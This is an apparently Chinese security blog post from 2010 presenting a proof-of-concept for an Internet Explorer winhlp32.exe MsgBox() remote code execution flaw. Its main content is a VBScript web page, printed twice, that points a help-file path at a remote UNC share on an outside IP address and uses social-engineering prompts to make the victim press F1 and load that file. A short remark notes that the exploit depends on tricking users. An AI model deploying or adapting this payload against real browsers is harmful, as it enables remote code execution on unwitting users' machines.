Internet Explorer的’winhlp32.exe中’MsgBox（）’远程执行代码漏洞

2010年03月03日 | category

工具收集| 坏人咖啡

测试代码：


&lt;html&gt;
&lt;script type="text/vbscript"&gt;
big = "\\184.73.14.110\PUBLIC\test.hlp"

//For i=1 to 2500
//  big = big &amp; "\..\"
//Next

MsgBox "please press F1 to save the world", ,"please save the world",
big, 1
MsgBox "press F1 to close this annoying popup", ,"", big, 1
MsgBox "press F1 to close this annoying popup", ,"", big, 1
&lt;/script&gt;
&lt;/html&gt;

<html>

big = "\\184.73.14.110\PUBLIC\test.hlp"

//For i=1 to 2500

// big = big & "\..\"

//Next

MsgBox "please press F1 to save the world", ,"please save the world",

big, 1

MsgBox "press F1 to close this annoying popup", ,"", big, 1

</script>

</html>

这个代码利用起来比较麻烦需要诱导别人按F1键才可以

HLP文件 msgbox_test_help

貌似国内的XX操作系统里边都没有帮助文件！

所属分类: 工具收集
Tags: IE, 漏洞

« Safe3 SQL Injector 3.0免费版

Fckeditor漏洞利用方法总结 »

没有评论

暂无评论

RSS feed for comments on this post.

对不起，该文章的评论被关闭了！

文章分类
热门标签
- 0DAY 360 bypass dreamhost ecshop google IE ie6 Linux mysql nginx php pin Python QQ Remote sql ubuntu windows XSS 人人网卸载后台命令咖啡备份字典微博忙提权攻击文件旁注本地注入源码漏洞爱情瑞星百度破解解析跨域跨站钓鱼
随机文章
文章归档
Users
- 登录

Internet Explorer的’winhlp32.exe中’MsgBox（）’远程执行代码漏洞

没有评论

文章分类

热门标签

随机文章

文章归档

Users